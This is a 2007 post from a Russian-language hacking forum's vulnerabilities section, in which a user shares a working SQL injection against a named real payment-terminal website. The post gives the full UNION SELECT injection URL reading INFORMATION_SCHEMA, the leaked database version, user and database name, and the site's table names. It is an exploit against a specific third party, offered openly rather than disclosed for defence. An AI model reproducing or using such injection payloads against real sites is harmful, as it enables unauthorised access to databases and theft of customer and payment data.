HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 17.11.2007, 02:56
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

Бага в юнекте (кто в танке - вот идешь ты пополнять баланс, а тут юнект...). Нашел Ув. Товарищ Dj_Bes и выложил в болталке за что очень несправедливо получил кучу брани в свой адрес. Инъекцию выкладывал не разработанную, я довел ее до ума, вот результаты:
5.0.40-log;unactpay@pechkin;unactpay_db
http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12, 13+from+INFORMATION_SCHEMA.tables+LIMIT+1,1/*
таблицы походу такие:
file
menu
news
offices
order_rent
page
partners
provider
terminal
terminal_category
terminal_type
filepriv не позволяет проводить операции с файлами =\.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ